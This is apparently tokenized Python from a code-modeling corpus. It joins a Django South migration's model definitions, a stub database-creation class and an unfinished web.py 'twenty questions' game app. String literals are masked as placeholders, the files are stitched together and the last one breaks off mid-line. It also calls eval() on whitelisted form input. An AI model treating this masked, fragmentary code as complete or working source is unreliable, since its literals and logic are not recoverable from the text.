, [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:max_length>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:html>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:5>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:3>' , '<STR_LIT:blank>' : '<STR_LIT:3>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> if HAS_TAG_SUPPORT : <EOL> models [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : ( '<STR_LIT>' , [ ] , <EOL> { } ) , } ) <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import sys <EOL> import time <EOL> from django . conf import settings <EOL> from django . db . utils import load_backend <EOL> from django . db . backends import creation <EOL> TEST_DATABASE_PREFIX = '<STR_LIT>' <EOL> class BaseDatabaseCreation ( creation . BaseDatabaseCreation ) : pass </s>
<s> __author__ = '<STR_LIT>' </s>
<s> '''<STR_LIT>''' <EOL> import web <EOL> import config , model <EOL> import twentyquestions as game <EOL> import admin <EOL> urls = ( <EOL> '<STR_LIT:/>' , '<STR_LIT:index>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , admin . app <EOL> ) <EOL> app = web . application ( urls , globals ( ) ) <EOL> render = web . template . render ( '<STR_LIT>' , base = '<STR_LIT>' ) <EOL> session_vars = { '<STR_LIT:count>' : <NUM_LIT:1> , '<STR_LIT>' : { } , '<STR_LIT>' : [ ] , '<STR_LIT>' : { } } <EOL> session = web . session . Session ( app , web . session . DiskStore ( '<STR_LIT>' ) , initializer = session_vars ) <EOL> def reset_game ( ) : <EOL> '''<STR_LIT>''' <EOL> session . kill ( ) <EOL> class index : <EOL> def GET ( self ) : <EOL> '''<STR_LIT>''' <EOL> if config . DISPLAY_CANDIDATES : <EOL> nearby_objects_values = game . get_nearby_objects_values ( session . objects_values , how_many = <NUM_LIT:10> ) <EOL> else : <EOL> nearby_objects_values = None <EOL> if not ( session . get ( '<STR_LIT>' ) ) and not ( session . get ( '<STR_LIT>' ) ) : <EOL> question = '<STR_LIT>' <EOL> else : <EOL> question = game . choose_question ( session . initial_questions , session . objects_values , session . asked_questions ) <EOL> if question == None or session . count > <NUM_LIT:20> : <EOL> raise web . seeother ( '<STR_LIT>' ) <EOL> return render . index ( question , session . get ( '<STR_LIT:count>' ) , nearby_objects_values ) <EOL> class begin : <EOL> def POST ( self ) : <EOL> '''<STR_LIT>''' <EOL> session . initial_questions = game . load_initial_questions ( ) <EOL> session . objects_values = game . load_objects_values ( ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> class restart : <EOL> def POST ( self ) : <EOL> '''<STR_LIT>''' <EOL> reset_game ( ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> class answer : <EOL> def POST ( self , question_id ) : <EOL> '''<STR_LIT>''' <EOL> question_id = int ( question_id ) <EOL> a = web . input ( ) . answer <EOL> if a in [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT>' ] : answer = eval ( '<STR_LIT>' + a ) <EOL> else : answer = game . unsure <EOL> if answer != game . unsure : <EOL> session . count += <NUM_LIT:1> <EOL> game . update_local_knowledgebase ( session . objects_values , session . asked_questions , question_id , answer ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> class guess : <EOL> def GET ( self , chosen_id = None ) : <EOL> '''<STR_LIT>''' <EOL> chosen = game . guess ( session . objects_values ) <EOL> return render . guess ( chosen ) <EOL> def POST ( self , chosen_id = None ) : <EOL> '''<STR_LIT>''' <EOL> a = web . input ( ) . answer <EOL> if not ( chosen_id ) : <EOL> chosen_id = <NUM_LIT:1> <EOL> if a in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise web . seeother ( '<STR_LIT>' ) <EOL> elif a in [ '<STR_LIT:yes>' ] : <EOL> game . learn ( session . asked_questions , int ( chosen_id ) ) <EOL> reset_game ( ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> class learn : <EOL> def GET ( self ) : <EOL> '''<STR_LIT>''' <EOL> nearby_objects = game . get_nearby_objects ( session . objects_values , how_many = <NUM_LIT:20> ) <EOL> return render . learn ( nearby_objects ) <EOL> def POST ( self ) : <EOL> '''<STR_LIT>''' <EOL> inputs = web . input ( ) <EOL> name = inputs . get ( '<STR_LIT:name>' ) <EOL> if name == "<STR_LIT>" : <EOL> name = inputs . get ( '<STR_LIT>' ) <EOL> question = inputs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if question : <EOL> new_question_answer = inputs . get ( '<STR_LIT>' ) <EOL> if new_question_answer in [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> answer = eval ( '<STR_LIT>' + new_question_answer ) * game . NEW_QUESTION_SCALE <EOL> else : answer = game . unsure <EOL> if question . strip ( ) != '<STR_LIT>' and not ( model . get_question_by_text ( question . strip ( ) ) ) : <EOL> new_question_id = model . add_question ( question ) <EOL> else : <EOL> new_question = model . get_question_by_text ( question . strip ( ) ) <EOL> if new_question : <EOL> new_question_id = new_question . id <EOL> else : <EOL> new_question_id = None <EOL> if name : <EOL> new_object_id = game . learn_character ( session . asked_questions , name ) <EOL> else : <EOL> new_object_id = None <EOL> if new_question_id 